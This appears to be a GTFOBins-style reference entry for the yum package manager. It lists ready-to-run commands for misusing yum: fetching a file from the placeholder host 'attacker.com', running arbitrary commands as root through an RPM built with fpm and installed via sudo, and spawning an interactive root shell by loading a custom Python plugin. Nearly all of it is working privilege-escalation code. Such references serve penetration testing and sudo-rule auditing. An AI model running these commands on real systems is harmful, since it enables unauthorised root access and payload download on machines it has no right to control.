It can download remote files.
Fetch a remote file via HTTP GET request. The file on the remote host must have an extension of .rpm
, the content does not have to be an RPM file. The file will be downloaded to a randomly created directory in /var/tmp
, for example /var/tmp/yum-root-cR0O4h/
.
RHOST=attacker.com
RFILE=file_to_get.rpm
yum install http://$RHOST/$RFILE
If the binary is allowed to run as superuser by sudo
, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
It runs commands using a specially crafted RPM package. Generate it with fpm and upload it to the target.
TF=$(mktemp -d)
echo 'id' > $TF/x.sh
fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF
sudo yum localinstall -y x-1.0-1.noarch.rpm
Spawn interactive root shell by loading a custom plugin.
TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
os.execl('/bin/sh','/bin/sh')
EOF
sudo yum -c $TF/x --enableplugin=y